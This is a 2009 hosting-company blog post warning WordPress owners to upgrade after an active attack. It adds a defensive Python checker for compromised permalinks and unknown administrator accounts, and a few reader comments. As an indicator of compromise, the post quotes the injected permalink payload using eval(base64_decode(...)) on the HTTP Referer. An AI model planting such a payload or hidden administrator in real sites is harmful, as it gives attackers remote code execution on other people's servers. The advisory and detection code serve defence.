Wordpress Exploit – Upgrade Now!
Posted by: Tim M. // September 5th, 2009 // WordPress
If you are using Wordpress you must make sure you upgrade it to 2.8.4 *IMMEDIATELY* or remove it from your site entirely.
Last night a number of people on Twitter and blogs mentioned that their Wordpress sites were acting up. Specifically, permalinks were broken and showing up with weird code.
There are two clues that your WordPress site has been attacked:
1) There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.” (Check your permalinks in Admin > Settings > Permalinks).
2) A “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account.
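An added defender-side check, not code from the original post or from WordPress, that applies the two clues above to values read out of a site's database: the `permalink_structure` option (from wp_options) and the accounts holding the administrator role. The sample values are constructed to resemble the link quoted above, and the `known_admins` allowlist is assumed to be filled in by the site owner.

```python
import re
from urllib.parse import unquote

# Substrings named in the post (eval / base64_decode) plus the other pieces of
# the injected expression; matched after URL-decoding so either stored form is caught.
SUSPECT_TOKENS = ("eval(", "base64_decode", "${", "$_SERVER", "|.+")

# Tags a legitimate WordPress permalink structure is built from.
LEGIT_TAG_RE = re.compile(
    r"%(year|monthnum|day|hour|minute|second|post_id|postname|category|author)%")

# Constructed sample, modelled on the link quoted in the post: the option value
# as it might be read back from wp_options.permalink_structure on a hacked site.
HACKED_STRUCTURE = ("/%category%/%postname%/%&(%7B$%7Beval(base64_decode"
                    "($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/")

# Constructed sample rows: (user_login, display_name, role) as joined from wp_users/wp_usermeta.
SAMPLE_USERS = [
    ("tim", "Tim M.", "administrator"),
    ("editor1", "Site Editor", "editor"),
    ("admin-2", "Administrator (2)", "administrator"),
]

def check_permalink_structure(value: str) -> list[str]:
    """Return reasons the permalink_structure option looks tampered with; [] means clean."""
    decoded = unquote(value)
    findings = [f"contains {tok!r}" for tok in SUSPECT_TOKENS if tok in decoded]
    # Strip the legitimate tags; a clean structure leaves only path characters behind.
    residue = LEGIT_TAG_RE.sub("", decoded)
    if re.search(r"[^A-Za-z0-9/_\-.]", residue):
        findings.append(f"unexpected characters outside standard tags: {residue!r}")
    return findings

def check_users(users, known_admins: set[str]) -> list[str]:
    """Flag administrator accounts the site owner does not recognise (the hidden back door)."""
    findings = []
    for login, display, role in users:
        if role != "administrator":
            continue
        if login not in known_admins:
            findings.append(f"unknown administrator: login={login!r} display={display!r}")
        if re.fullmatch(r"Administrator \(\d+\)", display):
            findings.append(f"display name matches the pattern from the post: {display!r}")
    return findings

if __name__ == "__main__":
    print("permalinks:", check_permalink_structure(HACKED_STRUCTURE) or "clean")
    print("users:", check_users(SAMPLE_USERS, {"tim"}) or "clean")
```

Any non-empty result means the site needs the export, reinstall and re-import described below, not just an upgrade.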
Wordpress has confirmed that attackers are actively compromising sites that are not running the most-current version of Wordpress (any version below 2.8.4 as of 05/09/2009; there are rumours that 2.8.5 is due to be released imminently, so keep an eye out for that too).
If you have not yet been hacked, UPGRADE NOW! Immediately. Stop reading this, really, and go upgrade. If you don’t know how, ask. Send out a message on Twitter or open a support ticket.
If you have been hacked, sorry, you’re going to be busy! Upgrading alone will not fix a hacked site. Mashable.com’s alert said: “You’ll likely need to export all your content with the built-in XML WordPress export, uninstall and reinstall WordPress and re-import the content. It’s a nasty attack that goes all the way into the database, so exporting the database will result in exporting the hacked code too.”
Not sure how to do that? It’s not that difficult, but it is very time-consuming. Step-by-step instructions may be coming soon, so keep checking our blog and other sites; www.wordpress.org/support itself and www.mashable.com are always worth checking.
I cannot stress enough how important it is to keep your software installations up-to-date. A number of our customers have reported problems in the last 48 hours, and the source of these problems has been out-of-date Wordpress installs. Remember: if your scripts are out-of-date then your site is insecure and could be hacked at any moment.
Best regards,
Tim @ Evohosting
Tags: uk wordpress hosting, upgrade wordpress, wordpress 2.8.1 exploit, wordpress 2.8.2 exploit, wordpress 2.8.3 exploit, wordpress blog hack, wordpress blog hacked, wordpress exploit, wordpress hosting, wordpress hosting uk
I agree you should upgrade now; the new version is excellent!
Well it is a good thing I just recently upgraded. I didn’t even know about the exploit. Thanks for the very good information. Hopefully everyone knows about this now.
Due to this, one of my friend’s sites was reported for web forgery. We have to upgrade to the latest version to solve the problem.